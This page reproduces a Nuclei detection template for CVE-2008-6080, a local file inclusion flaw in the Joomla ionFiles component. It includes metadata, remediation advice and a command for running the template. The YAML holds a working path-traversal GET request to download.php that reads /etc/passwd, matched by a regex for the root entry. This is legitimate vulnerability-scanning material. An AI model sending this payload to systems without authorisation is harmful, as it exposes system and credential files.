Joomla! ionFiles 4.4.2 - Local File Inclusion
ID: CVE-2008-6080
Severity: medium
Author: daffainfo
Tags: cve,cve2008,edb,joomla,lfi,codecall
Description
Section titled “Description”Joomla! ionFiles 4.4.2 is susceptible to local file inclusion in download.php in the ionFiles (com_ionfiles) that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
YAML Source
Section titled “YAML Source”id: CVE-2008-6080
info: name: Joomla! ionFiles 4.4.2 - Local File Inclusion author: daffainfo severity: medium description: Joomla! ionFiles 4.4.2 is susceptible to local file inclusion in download.php in the ionFiles (com_ionfiles) that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. impact: | Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution. remediation: | Update Joomla! ionFiles to the latest version or apply the provided patch to mitigate the vulnerability. reference: - https://www.exploit-db.com/exploits/6809 - https://nvd.nist.gov/vuln/detail/CVE-2008-6080 - https://exchange.xforce.ibmcloud.com/vulnerabilities/46039 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2008-6080 cwe-id: CWE-22 epss-score: 0.03314 epss-percentile: 0.9132 cpe: cpe:2.3:a:codecall:com_ionfiles:4.4.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: codecall product: com_ionfiles tags: cve,cve2008,edb,joomla,lfi,codecall
http: - method: GET path: - "{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1"
matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 4a0a00473045022100e60b52403ca968b56428fbf8ae02f3d2df0abe3cb1a5056fcbaa333403ecd6130220127944d011764ec50f3922364fdac9f45144dd249bba7916880f318f3f7d9f34:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2008/CVE-2008-6080.yaml"